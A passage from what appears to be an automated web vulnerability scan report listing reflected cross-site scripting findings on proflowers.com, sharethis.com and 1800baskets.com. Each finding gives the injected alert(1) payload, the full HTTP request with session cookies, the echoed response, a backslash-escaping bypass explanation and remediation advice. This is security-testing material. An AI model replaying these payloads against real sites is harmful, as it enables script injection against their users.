The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1abf9\"%3balert(1)//e408dc57373 was submitted in the tile parameter. This input was echoed as 1abf9\\";alert(1)//e408dc57373 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /house-plants-PBS?tile=hmpg_podA1abf9\"%3balert(1)//e408dc57373&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fhouse-plants-PBS%25253Ftile%25253Dhmpg_podA%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:16:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:16:39 GMT
Content-Length: 198580


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
nguage="JavaScript" type="text/javascript">s.pageName = "PFC:Category:PBS";if ("Category" == "SEO-Local") {s.prop1 = "PFC:Category:SEO-";}else {s.prop1 = "PFC:Category:PBS";}s.eVar8 = "";if ("hmpg_podA1abf9\\";alert(1)//e408dc57373" != "") {s.eVar20 = "PFC_hmpg_podA1abf9\\";alert(1)//e408dc57373_";}</script>
...[SNIP]...

4.194. http://www.proflowers.com/mothers-day-flowers-MDF [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /mothers-day-flowers-MDF

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c36a\"%3balert(1)//decb137eb0b was submitted in the tile parameter. This input was echoed as 6c36a\\";alert(1)//decb137eb0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /mothers-day-flowers-MDF?tile=hmpg_hero16c36a\"%3balert(1)//decb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fmothers-day-flowers-MDF%25253Ftile%25253Dhmpg_hero1%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:09 GMT
Content-Length: 255379


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
guage="JavaScript" type="text/javascript">s.pageName = "PFC:Category:MDF";if ("Category" == "SEO-Local") {s.prop1 = "PFC:Category:SEO-";}else {s.prop1 = "PFC:Category:MDF";}s.eVar8 = "";if ("hmpg_hero16c36a\\";alert(1)//decb137eb0b" != "") {s.eVar20 = "PFC_hmpg_hero16c36a\\";alert(1)//decb137eb0b_";}</script>
...[SNIP]...

4.195. http://www.proflowers.com/send-flowers-bsl [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /send-flowers-bsl

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22db9\"%3balert(1)//18210ad228e was submitted in the tile parameter. This input was echoed as 22db9\\";alert(1)//18210ad228e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /send-flowers-bsl?tile=22db9\"%3balert(1)//18210ad228e&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM?0&5/9/2011 5:29:48 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:29:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:29:49 GMT
Content-Length: 247576


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
script language="JavaScript" type="text/javascript">s.pageName = "PFC:Category:bsl";if ("Category" == "SEO-Local") {s.prop1 = "PFC:Category:SEO-";}else {s.prop1 = "PFC:Category:bsl";}s.eVar8 = "";if ("22db9\\";alert(1)//18210ad228e" != "") {s.eVar20 = "PFC_22db9\\";alert(1)//18210ad228e_";}</script>
...[SNIP]...

4.196. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b4f5</script><script>alert(1)</script>3d893853418 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a3b4f5</script><script>alert(1)</script>3d893853418; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:13:06 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:13:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:13:06 GMT
Content-Length: 143391


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
=100000;
resx.event="Product";
resx.links="30050137;5519;42864;";
resx.itemid = "30050137";
resx.qty="1";
resx.price="49.98";
resx.total="";
resx.customerid="91621bab-4967-45f8-ad8e-98be730e6e4a3b4f5</script><script>alert(1)</script>3d893853418";
resx.transactionid = "";


resx.cv2 = "PFC";
resx.cv3 = "HPC";
resx.cv4 = "27";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

4.197. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa3cf</script><script>alert(1)</script>87e0272715b was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4afa3cf</script><script>alert(1)</script>87e0272715b; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:37:14 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:37:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:37:14 GMT
Content-Length: 138355


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

resx.event="Product";
resx.links="30008396;5519;42864;30050137;";
resx.itemid = "30008396";
resx.qty="1";
resx.price="39.99";
resx.total="";
resx.customerid="91621bab-4967-45f8-ad8e-98be730e6e4afa3cf</script><script>alert(1)</script>87e0272715b";
resx.transactionid = "";


resx.cv2 = "PFC";
resx.cv3 = "PBS";
resx.cv4 = "27";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

4.198. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1aebe</script><script>alert(1)</script>f63217f9c47 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a1aebe</script><script>alert(1)</script>f63217f9c47; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:29:34 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:29:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:29:34 GMT
Content-Length: 141286


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

resx.event="Product";
resx.links="30003767;5519;42864;30050137;";
resx.itemid = "30003767";
resx.qty="1";
resx.price="49.98";
resx.total="";
resx.customerid="91621bab-4967-45f8-ad8e-98be730e6e4a1aebe</script><script>alert(1)</script>f63217f9c47";
resx.transactionid = "";


resx.cv2 = "PFC";
resx.cv3 = "PBS";
resx.cv4 = "27";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

4.199. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 5b716<script>alert(1)</script>eaf91aadd9b was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&jsref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&rnd=1304903453531 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==5b716<script>alert(1)</script>eaf91aadd9b; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 09 May 2011 01:18:10 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==5b716<script>alert(1)</script>eaf91aadd9b
userid:
</div>
...[SNIP]...

4.200. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /product.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c266'-alert(1)-'ef80968ac09 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

